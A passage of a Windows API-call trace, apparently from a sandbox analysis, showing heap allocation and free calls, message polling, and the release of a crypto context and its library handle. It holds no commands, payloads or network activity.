wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0249.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0249.109] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0249.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0249.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0249.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0249.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.206] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.206] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.206] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0249.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0249.206] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0249.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0249.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0249.208] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0249.208] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0249.208] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0249.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0249.208] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0249.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0249.209] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0249.209] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0249.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.209] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0249.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0249.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0249.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0249.211] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0249.211] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0249.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0249.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0249.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0249.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0249.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.213] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0249.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.213] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0249.213] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0249.213] FreeLibrary (hLibModule=0x756e0000) returned 1 [0249.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0249.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0249.213] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0249.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0249.214] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.214] CloseHandle (hObject=0x2a0) returned 1 [0249.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0249.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0249.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0249.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0249.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0249.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 